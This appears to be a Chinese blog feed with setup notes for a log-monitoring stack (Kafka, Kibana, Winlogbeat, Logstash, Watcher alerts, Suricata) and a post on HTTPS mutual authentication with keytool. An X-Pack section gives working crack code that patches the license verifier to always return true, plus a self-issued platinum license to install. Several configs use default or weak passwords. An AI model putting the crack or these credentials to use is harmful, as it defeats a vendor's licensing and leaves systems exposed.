<p>wget <a href="http://mirrors.hust.edu.cn/apache/kafka/0.11.0.2/kafka-0.11.0.2-src.tgz" target="_blank" rel="external">http://mirrors.hust.edu.cn/apache/kafka/0.11.0.2/kafka-0.11.0.2-src.tgz</a></p>
<p>配置 server.properties<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">broker.id=0</div><div class="line">listeners=PLAINTEXT://kafka01:9092</div><div class="line">advertised.listeners=PLAINTEXT://kafka01:9092</div></pre></td></tr></table></figure></p>
<p>修改启动脚本jvm内存使用大小<br><code>export KAFKA_HEAP_OPTS="-Xmx512M -Xms256M"</code></p>
<p>启动服务<br><code>nohup bin/zookeeper-server-start.sh config/zookeeper.properties > zk.out 2>&1 &</code><br><code>nohup bin/kafka-server-start.sh config/server.properties > kafka.out 2>&1 &</code></p>
<p><code>bin/kafka-server-start.sh -daemon config/server.properties</code></p>
<p>自动创建topoic<br><code>bin/kafka-console-producer.sh --broker-list localhost:9092 --topic test</code></p>
<p>查看已创建的topic<br><code>bin/kafka-topics.sh --list --zookeeper localhost:2181</code></p>
<p>查看test topic详情<br><code>bin/kafka-topics.sh --describe --zookeeper localhost:2181 --topic test</code></p>
<p>删除topic<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">bin/kafka-topics.sh --delete --zookeeper localhost:2181 --topic test # 标记删除</div><div class="line">bin/zookeeper-shell.sh localhost:2181 # zk 删除</div><div class="line">ls /brokers/topics</div><div class="line">rmr /brokers/topics/test</div></pre></td></tr></table></figure></p>
<blockquote>
<p>或者修改server.properties文件参数delete.topic.enable=true</p>
</blockquote>
<p>测试</p>
<p>生产者<br><code>bin/kafka-console-producer.sh --broker-list localhost:9092 --topic test</code></p>
<p>消费者<br><code>bin/kafka-console-consumer.sh --zookeeper localhost:2181 --topic test --from-beginning</code></p>
<blockquote>
<p>生产者消费者机器必须写kafka主机名hosts</p>
</blockquote>
<h4 id="集群"><a href="#集群" class="headerlink" title="集群"></a>集群</h4><p>zookeeper.properties<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">initLimit=10</div><div class="line">syncLimit=5</div><div class="line">dataDir=/tmp/zookeeper</div><div class="line">clientPort=2181</div><div class="line">maxClientCnxns=0</div><div class="line">server.0=kafka:2888:3888</div><div class="line">server.1=kafka01:2889:3889</div><div class="line">server.2=kafka02:2890:3890</div></pre></td></tr></table></figure></p>
<p>在dataDir目录设置各自的id<br><code>mkdir -p /tmp/zookeeper/log && echo [server.id] > /tmp/zookeeper/myid</code></p>
<p>server.properties<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">broker.id=0 # 配置不同的id</div><div class="line">listeners=PLAINTEXT://kafka:9092</div><div class="line">advertised.listeners=PLAINTEXT://kafka:9092</div><div class="line">zookeeper.connect=kafka:2181,kafka01:2181,kafka02:2181</div></pre></td></tr></table></figure></p>
<p>测试</p>
<p>创建topic并向任意broker写入消息,从任意broker读取消息。</p>
<p>创建Topic<br><code>bin/kafka-topics.sh --create --zookeeper devkafka01:2181,devkafka02:2181,devkafka03:2181 --replication-factor 3 --partition 3 --topic mytopic</code></p>
<p>列出topic<br><code>bin/kafka-topics.sh --list --zookeeper localhost:2181</code></p>
<p>查看Topic<br><code>bin/kafka-topics.sh --describe --zookeeper devkafka01:2181 --topic mytopic</code></p>
<p>创建生产者<br><code>bin/kafka-console-producer.sh --broker-list devkafka01:9092,devkafka02:9092,devkafka03:9092 --topic mytopic</code></p>
<p>创建消费者<br><code>bin/kafka-console-consumer.sh --zookeeper devkafka01:2181,devkafka02:2181,devkafka03:2181 --from-beginning --topic mytopic</code></p>
<h4 id="监控"><a href="#监控" class="headerlink" title="监控"></a>监控</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">#!/bin/bash</div><div class="line">java -cp KafkaOffsetMonitor-assembly-0.3.0-SNAPSHOT.jar \</div><div class="line">com.quantifind.kafka.offsetapp.OffsetGetterWeb \</div><div class="line">--offsetStorage kafka \</div><div class="line">--zk devkafka01,devkafka02,devkafka03 \</div><div class="line">--port 8080 \</div><div class="line">--refresh 10.seconds \</div><div class="line">--retain 1.days</div></pre></td></tr></table></figure>
<p>nohup ./kom.sh > /dev/null 2>&1 &</p>
<h4 id="压力测试"><a href="#压力测试" class="headerlink" title="压力测试"></a>压力测试</h4><h3 id="Kibana"><a href="#Kibana" class="headerlink" title="Kibana"></a>Kibana</h3><p>/etc/kibana/kibana.yml</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">server.port: 5601 # kibana 监听端口</div><div class="line">server.host: 0.0.0.0 # 监听ip</div><div class="line">elasticsearch.url: "http://127.0.0.1:9200" # es主节点</div><div class="line">elasticsearch.username: "elastic"</div><div class="line">elasticsearch.password: "changeme"</div></pre></td></tr></table></figure>
<p>离线安装x-pack</p>
<p><code>bin/kibana-plugin install file:///tmp/x-pack-5.6.10.zip</code></p>
<p>service kibana start<br>or<br>nohup bin/kibana &</p>
<h3 id="图表"><a href="#图表" class="headerlink" title="图表"></a>图表</h3><p>告警类型饼图<br>攻击源地址柱状图<br>访问的url信息</p>
<h3 id="Grafana"><a href="#Grafana" class="headerlink" title="Grafana"></a>Grafana</h3><h3 id="Beats"><a href="#Beats" class="headerlink" title="Beats"></a>Beats</h3><p>Winlogbeat 5.6.10</p>
<p>配置<br>winlogbeat.yml<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">#----------------------------- Logstash output --------------------------------</div><div class="line">output.logstash:</div><div class="line"> # The Logstash hosts</div><div class="line"> hosts: ["192.168.200.109:5044"]</div><div class="line"> </div><div class="line">#--------------------------kafka-----------------------------------</div><div class="line">output.kafka:</div><div class="line"> # initial brokers for reading cluster metadata</div><div class="line"> hosts: ["192.168.6.22:9092"]</div><div class="line"> topic: "test"</div></pre></td></tr></table></figure></p>
<p>Logstash<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">input {</div><div class="line"> beats {</div><div class="line"> port => 5044</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure></p>
<p>检查配置<br><code>.\winlogbeat.exe -c .\winlogbeat.yml -configtest -e</code></p>
<p>安装<br><code>PS C:\winlogbeat-5.6.10-windows-x86_64> .\install-service-winlogbeat.ps1</code><br>启动服务<br><code>net start winlogbeat</code></p>
<h3 id="Flume"><a href="#Flume" class="headerlink" title="Flume"></a>Flume</h3><h3 id="X-Pack"><a href="#X-Pack" class="headerlink" title="X-Pack"></a>X-Pack</h3><p>默认密码<br>username: elastic<br>password: changeme</p>
<p>破解</p>
<p>LicenseVerifier.java<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div></pre></td><td class="code"><pre><div class="line">package org.elasticsearch.license;</div><div class="line"></div><div class="line">import java.nio.*;</div><div class="line">import java.util.*;</div><div class="line">import java.security.*;</div><div class="line">import org.elasticsearch.common.xcontent.*;</div><div class="line">import org.apache.lucene.util.*;</div><div class="line">import org.elasticsearch.common.io.*;</div><div class="line">import java.io.*;</div><div class="line"></div><div class="line">public class LicenseVerifier</div><div class="line">{</div><div class="line"> public static boolean verifyLicense(final License license, final byte[] encryptedPublicKeyData) {</div><div class="line"> return true;</div><div class="line"> }</div><div class="line"></div><div class="line"> public static boolean verifyLicense(final License license) {</div><div class="line"> return true;</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure></p>
<p><code>javac -cp "/usr/share/elasticsearch/lib/elasticsearch-5.6.10.jar:/usr/share/elasticsearch/lib/lucene-core-6.6.1.jar:/usr/share/elasticsearch/plugins/x-pack/x-pack-5.6.10.jar" LicenseVerifier.java</code></p>
<p>注册新的license<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">{"license":{"uid":"d3cbbbee-9155-4e1a-a5ed-a7e8940d6564","type":"platinum","issue_date_in_millis":1499299200000,"expiry_date_in_millis":2524579200999,"max_nodes":1000,"issued_to":"guo dalu (eastmoney)","issuer":"Web Form","signature":"AAAAAwAAAA0C9L3AjL50eKgiW55YAAABmC9ZN0hjZDBGYnVyRXpCOW5Bb3FjZDAxOWpSbTVoMVZwUzRxVk1PSmkxaktJRVl5MUYvUWh3bHZVUTllbXNPbzBUemtnbWpBbmlWRmRZb25KNFlBR2x0TXc2K2p1Y1VtMG1UQU9TRGZVSGRwaEJGUjE3bXd3LzRqZ05iLzRteWFNekdxRGpIYlFwYkJiNUs0U1hTVlJKNVlXekMrSlVUdFIvV0FNeWdOYnlESDc3MWhlY3hSQmdKSjJ2ZTcvYlBFOHhPQlV3ZHdDQ0tHcG5uOElCaDJ4K1hob29xSG85N0kvTWV3THhlQk9NL01VMFRjNDZpZEVXeUtUMXIyMlIveFpJUkk2WUdveEZaME9XWitGUi9WNTZVQW1FMG1DenhZU0ZmeXlZakVEMjZFT2NvOWxpZGlqVmlHNC8rWVVUYzMwRGVySHpIdURzKzFiRDl4TmM1TUp2VTBOUlJZUlAyV0ZVL2kvVk10L0NsbXNFYVZwT3NSU082dFNNa2prQ0ZsclZ4NTltbU1CVE5lR09Bck93V2J1Y3c9PQAAAQB2gL4WXN64P0+c5q6TDyhqPllFvkboZMWjzJHid05qCtI86/I0aSsFgYF3AkVA1qoz7UHsjC/xBsoyhuXfmHn6LbsZYXweZ4LsllG8RJ8HH/bBYVTBt+Mag+wXE/QZUS7HnSA8iAReQ7tY//wyuEVrxFDeAI9cgwWN90RoZ3sAgkzGq0jVr2JoUYeYwNJ4GZ2GMDS7GsHBxNWBJVgfDkZXvLya/jOJhaKi2GvW8mIzFp19/FO+t2+ReUkbF3T35nVIZnqFDVhXtOz981By4ArffE8ythlI4X67Nabtzoy87V5gXanBvsSdHiHpYJMrYwn7DU+93Ie6t56Lesjkj//b","start_date_in_millis":1499299200000}}</div></pre></td></tr></table></figure></p>
<p><code>curl -XPUT -u elastic:changeme 'http://30.3.229.120:9200/_xpack/license?acknowledge=true' -d @l.json</code><br><code>curl -XGET -u elastic:changeme 'http://30.3.229.120:9200/_license'</code></p>
<h4 id="Watcher"><a href="#Watcher" class="headerlink" title="Watcher"></a>Watcher</h4><p>监控含有alert的日志并发送邮件告警</p>
<p>配置elasticsearch.yml<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line">xpack.notification.email.account:</div><div class="line"> exchange_account:</div><div class="line"> profile: outlook</div><div class="line"> email_defaults:</div><div class="line"> from: user@domain.com</div><div class="line"> smtp:</div><div class="line"> auth: true</div><div class="line"> starttls.enable: false</div><div class="line"> host: mail.domain.com </div><div class="line"> port: 587</div><div class="line"> user: user</div><div class="line"> password: pass</div></pre></td></tr></table></figure></p>
<p>“event_type”: “alert”,</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div></pre></td><td class="code"><pre><div class="line">{</div><div class="line"> "trigger": {</div><div class="line"> // 每间隔5m触发</div><div class="line"> "schedule": {</div><div class="line"> "interval": "5m"</div><div class="line"> }</div><div class="line"> },</div><div class="line"> "input": {</div><div class="line"> // 查询结果</div><div class="line"> "search": {</div><div class="line"> "request": {</div><div class="line"> "search_type": "query_then_fetch",</div><div class="line"> "indices": ["logstash-map-2018.07"],</div><div class="line"> "types": [],</div><div class="line"> "body": {</div><div class="line"> "size": 0,</div><div class="line"> "query": {</div><div class="line"> // bool 同时满足两个条件</div><div class="line"> "bool" : {</div><div class="line"> "must" : [</div><div class="line"> { "match" : { "event_type": "alert" }},</div><div class="line"> { "range" : { "@timestamp" : { "gte" : "now-1h" }}}</div><div class="line"> ]</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> },</div><div class="line"> // 判断acction条件</div><div class="line"> "condition": {</div><div class="line"> "compare": {</div><div class="line"> "ctx.payload.hits.total": {</div><div class="line"> "gte": 10</div><div class="line"> }</div><div class="line"> }</div><div class="line"> },</div><div class="line"> // 执行告警方式</div><div class="line"> "actions": {</div><div class="line"> "my-logging-action": {</div><div class="line"> "logging": {</div><div class="line"> "level": "info",</div><div class="line"> "text": "Fine {{ctx.payload.hits.total}} alerts in last 5m."</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure>
<p>聚合5m钟内登陆失败用户<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div></pre></td><td class="code"><pre><div class="line">GET logstash-dc01-security-2018.08/_search</div><div class="line">{</div><div class="line"> "size": 1,</div><div class="line"> "query": {</div><div class="line"> "bool" : {</div><div class="line"> "must" : [{ "match" : { "event_id" : 4625 }}],</div><div class="line"> "filter":[{ "range" : { "@timestamp" : { "gte" : "now-1d" }}}]</div><div class="line"> }</div><div class="line"> },</div><div class="line"> "aggs": {</div><div class="line"> "group_by_TargetUserName": {</div><div class="line"> "terms": {</div><div class="line"> "field": "event_data.TargetUserName.keyword"</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line">Result:</div><div class="line"></div><div class="line">"aggregations": {</div><div class="line"> "group_by_TargetUserName": {</div><div class="line"> "doc_count_error_upper_bound": 0,</div><div class="line"> "sum_other_doc_count": 0,</div><div class="line"> "buckets": [</div><div class="line"> {</div><div class="line"> "doc_count": 6,</div><div class="line"> "key": "test"</div><div class="line"> },</div><div class="line"> {</div><div class="line"> "doc_count": 2,</div><div class="line"> "key": "test1"</div><div class="line"> },</div><div class="line"> {</div><div class="line"> "doc_count": 1,</div><div class="line"> "key": "admin"</div><div class="line"> }</div><div class="line"> ]</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure></p>
<p>数组<br>ctx.payload.aggregations.group_by_TargetUserName.buckets</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">"condition": {</div><div class="line"> "array_compare": {</div><div class="line"> "ctx.payload.aggregations.group_by_TargetUserName.buckets" : { </div><div class="line"> "path": "doc_count" ,</div><div class="line"> "gte": { </div><div class="line"> "value": 25, </div><div class="line"> "quantifier": "some" </div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure>
<p>动作</p>
<p>发送邮件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div></pre></td><td class="code"><pre><div class="line">"send_email" : {</div><div class="line">"throttle_period": "15m",</div><div class="line"> "email" : {</div><div class="line"> "to" : "<username>@<domainname>", </div><div class="line"> "cc": ["a@<domainname>","b@<domainname>"]</div><div class="line"> "subject" : "Watcher Notification", </div><div class="line"> "body" : "Top10 users:\n{{#ctx.payload.aggregations.topn.buckets}}\n{{key}} {{doc_count}}\n{{/ctx.payload.aggregations.topn.buckets}}",</div><div class="line"> "attachments" : {</div><div class="line"> "attached_data" : {</div><div class="line"> "data" : {</div><div class="line"> "format" : "json"</div><div class="line"> }</div><div class="line"> }</div><div class="line"> },</div><div class="line"> "priority" : "high"</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure>
<p>webhook</p>
<h3 id="Suricata"><a href="#Suricata" class="headerlink" title="Suricata"></a>Suricata</h3><p><a href="https://suricata-ids.org/" target="_blank" rel="external">https://suricata-ids.org/</a></p>
<p>安装</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">sudo yum -y install gcc libpcap-devel pcre-devel libyaml-devel file-devel \</div><div class="line"> zlib-devel jansson-devel nss-devel libcap-ng-devel libnet-devel tar make \</div><div class="line"> libnetfilter_queue-devel lua-devel</div><div class="line">wget https://www.openinfosecfoundation.org/download/suricata-4.0.4.tar.gz</div><div class="line">tar -zxvf suricata-4.0.4.tar.gz</div><div class="line">cd suricata-4.0.4</div><div class="line">./configure --prefix=/usr --sysconfdir=/etc --localstatedir=/var --enable-nfqueue --enable-lua</div><div class="line">make & make install</div><div class="line">make install-full</div></pre></td></tr></table></figure>
<p>suricata -c /etc/suricata/suricata.yaml -i eth1</p>
<h4 id="更新规则"><a href="#更新规则" class="headerlink" title="更新规则"></a>更新规则</h4><p>pip install suricata-update </p>
<p>规则源<br><a href="https://www.openinfosecfoundation.org/rules/index.yaml" target="_blank" rel="external">https://www.openinfosecfoundation.org/rules/index.yaml</a></p>
<p>et/open: <a href="https://rules.emergingthreats.net/open/suricata-%(__version__)s/emerging.rules.tar.gz" target="_blank" rel="external">https://rules.emergingthreats.net/open/suricata-%(__version__)s/emerging.rules.tar.gz</a><br>et/pro: <a href="https://rules.emergingthreatspro.com/%(secret-code)s/suricata-%(__version__)s/etpro.rules.tar.gz" target="_blank" rel="external">https://rules.emergingthreatspro.com/%(secret-code)s/suricata-%(__version__)s/etpro.rules.tar.gz</a><br>oisf/trafficid: <a href="https://raw.githubusercontent.com/jasonish/suricata-trafficid/master/rules/traffic-id.rules" target="_blank" rel="external">https://raw.githubusercontent.com/jasonish/suricata-trafficid/master/rules/traffic-id.rules</a><br>ptresearch/attackdetection: <a href="https://raw.githubusercontent.com/ptresearch/AttackDetection/master/pt.rules.tar.gz" target="_blank" rel="external">https://raw.githubusercontent.com/ptresearch/AttackDetection/master/pt.rules.tar.gz</a><br>scwx/malware: <a href="https://ws.secureworks.com/ti/ruleset/%(secret-code)s/Suricata_suricata-malware_latest.tgz" target="_blank" rel="external">https://ws.secureworks.com/ti/ruleset/%(secret-code)s/Suricata_suricata-malware_latest.tgz</a><br>scwx/security: <a href="https://ws.secureworks.com/ti/ruleset/59af35658a44c415/Suricata_suricata-security_latest.tgz" target="_blank" rel="external">https://ws.secureworks.com/ti/ruleset/59af35658a44c415/Suricata_suricata-security_latest.tgz</a><br>sslbl/ssl-fp-blacklist: <a href="https://sslbl.abuse.ch/blacklist/sslblacklist.rules" target="_blank" rel="external">https://sslbl.abuse.ch/blacklist/sslblacklist.rules</a></p>
<h2 id="日志采集"><a href="#日志采集" class="headerlink" title="日志采集"></a>日志采集</h2><h3 id="Syslog"><a href="#Syslog" class="headerlink" title="Syslog"></a>Syslog</h3><p>syslog日志格式</p>
<p>WAF</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div></pre></td><td class="code"><pre><div class="line">input {</div><div class="line"> syslog {</div><div class="line"> timezone => "Asia/Shanghai"</div><div class="line"> id => "my_plugin_id"</div><div class="line"> port => 514</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line">filter {</div><div class="line"> # drop waf_log_wafstat</div><div class="line"> if [severity] == 6 {</div><div class="line"> drop { }</div><div class="line"> }</div><div class="line"> # waf log</div><div class="line"> if [severity] == 3 {</div><div class="line"> grok {</div><div class="line"> match => { "message" => "tag:%{DATA:tag}\s*site_id:%{INT:site_id}\s*protect_id:%{INT:protect_id}\s*dst_ip:%{IPORHOST:dst_ip}\s*dst_port:%{INT:dst_port}\s*src_ip:%{IPORHOST:src_ip}\s*src_port:%{INT:src_port}\s*method:%{DATA:method}\s*domain:%{DATA:domain}\s*uri:%{DATA:uri}\s*alertlevel:%{DATA:alert_level}\s*event_type:%{DATA:event_type}\s*stat_time:%{TIMESTAMP_ISO8601:stat_time}\s*policy_id:%{INT:policy_id}\s*rule_id:%{INT:rule_id}\s*action:%{DATA:action}\s*block:%{DATA:block}\s*block_info:%{DATA:block_info}\s*http:%{DATA:http}\s*alertinfo:%{DATA:alertinfo}\s*proxy_info:%{DATA:proxy_info}\s*characters:%{DATA:characters}\s*count_num:%{INT:count_num}\s*protocol_type:%{DATA:protocol_type}\s*wci:%{DATA:wci}\s*wsi:%{DATA:wsi}\s*country:%{DATA:country}"}</div><div class="line"> }</div><div class="line"> mutate {</div><div class="line"> remove_field => ["message"]</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line">output {</div><div class="line"> elasticsearch {</div><div class="line"> hosts => ["http://develk01:9200","http://develk02:9200","http://develk03:9200"]</div><div class="line"> user => "elastic"</div><div class="line"> password => "changeme"</div><div class="line"> index => "waf-cs-syslog-217"</div><div class="line"> }</div><div class="line"> stdout { codec => rubydebug }</div><div class="line">}</div></pre></td></tr></table></figure>
<h4 id="sysmon"><a href="#sysmon" class="headerlink" title="sysmon"></a>sysmon</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line">input {</div><div class="line"> beats {</div><div class="line"> port => 5044</div><div class="line"> }</div><div class="line">}</div><div class="line">filter{</div><div class="line"> mutate { </div><div class="line"> split => ["message","\r"]</div><div class="line"> remove_field => ["message","beat","@version"]</div><div class="line"> lowercase => ["host"] # index must be lower case</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line">"source_name" => "Microsoft-Windows-Security-Auditing"</div><div class="line">"Microsoft-Windows-Sysmon"</div><div class="line"></div><div class="line">output {</div><div class="line"> </div><div class="line"> elasticsearch {</div><div class="line"> hosts => ["http://develk01:9200"]</div><div class="line"> index => "logstash-%{[host]}-%{+YYYY.MM.dd}"</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title><![CDATA[HTTPS单向双向认证]]></title>
<url>/2018/11/02/HTTPS%E5%8D%95%E5%90%91%E5%8F%8C%E5%90%91%E8%AE%A4%E8%AF%81/</url>
<content type="html"><![CDATA[<ul>
<li>JKS:数字证书库。JKS里有KeyEntry和CertEntry,在库里的每个Entry都是靠别名(alias)来识别的。</li>
<li>P12:是PKCS12的缩写。同样是一个存储私钥的证书库,由.jks文件导出的,用户在PC平台安装,用于标示用户的身份。</li>
<li>CER:俗称数字证书,目的就是用于存储公钥证书,任何人都可以获取这个文件 。</li>
<li>BKS:Android平台专用证书库格式。</li>
</ul>
<p>crt转bks</p>
<p>下载Bouncy Castle,将该文件放到Java\jdk1.8.0_20\jre\lib\ext目录下,或者使用-providerpath指定路径。<br><a href="http://www.bouncycastle.org/latest_releases.html" target="_blank" rel="external">http://www.bouncycastle.org/latest_releases.html</a></p>
<p>keytool -importcert -v -trustcacerts -alias mykey -file githubcom.crt -keystore keystore.bks -storetype BKS -providerclass org.bouncycastle.jce.provider.BouncyCastleProvider -providerpath bcprov-jdk15on-1.47.jar -storepass testing</p>
<h1 id="单向认证"><a href="#单向认证" class="headerlink" title="单向认证"></a>单向认证</h1><h3 id="SSL-Pinning"><a href="#SSL-Pinning" class="headerlink" title="SSL Pinning"></a>SSL Pinning</h3><p>在客户端预置服务器公钥证书或者指纹,在和HTTPS请求获取的服务器证书做对比的方式。</p>
<h1 id="双向验证"><a href="#双向验证" class="headerlink" title="双向验证"></a>双向验证</h1><p>什么是双向认证?举个栗子。</p>
<blockquote>
<p>土匪:蘑菇,你哪路?什么价?(什么人?到哪里去?)<br>杨子荣:哈!想啥来啥,想吃奶来了妈妈,想娘家的人,孩子他舅舅来了。(找同行)<br>杨子荣:拜见三爷!<br>土匪:天王盖地虎!(你好大的胆!敢来气你的祖宗?)<br>杨子荣:宝塔镇河妖!(要是那样,叫我从山上摔死,掉河里淹死。)</p>
</blockquote>
<p>简单来说,当两个互不认识的人交易的时候,在A说出口令之后,B能说出只有A和B知道的口令。</p>
<h3 id="生成证书"><a href="#生成证书" class="headerlink" title="生成证书"></a>生成证书</h3><p>1) 生成客户端keystore</p>
<p><code>keytool -genkeypair -alias client -keyalg RSA -validity 3650 -keypass 123456 -storepass 123456 -keystore client.jks</code></p>
<p>2) 生成服务端keystore</p>
<p><code>keytool -genkeypair -alias server -keyalg RSA -validity 3650 -keypass 123456 -storepass 123456 -keystore server.keystore</code></p>
<p>注意:CN必须与IP地址匹配,否则需要修改host</p>
<p>3) 导出客户端证书</p>
<p><code>keytool -export -alias client -file client.cer -keystore client.jks -storepass 123456</code></p>
<p>4) 导出服务端证书</p>
<p><code>keytool -export -alias server -file server.cer -keystore server.keystore -storepass 123456</code></p>
<p>5) 证书交换</p>
<p>将客户端证书导入服务端keystore中,再将服务端证书导入客户端keystore中,一个keystore可以导入多个证书,生成证书列表。</p>
<p>生成客户端信任证书库(由服务端证书生成的证书库):<br><code>keytool -import -v -alias server -file server.cer -keystore truststore.jks -storepass 123456</code></p>
<p>将客户端证书导入到服务器证书库(使得服务器信任客户端证书):<br><code>keytool -import -v -alias client -file client.cer -keystore server.keystore -storepass 123456</code></p>
<p>6) 生成Android识别的BKS库文件</p>
<p>使用portecle将client.jks和truststore.jks转换成bks格式,放到android客户端的assert目录下。</p>
<h3 id="配置tomcat"><a href="#配置tomcat" class="headerlink" title="配置tomcat"></a>配置tomcat</h3><p>修改server.xml文件,配置8443端口 </p>
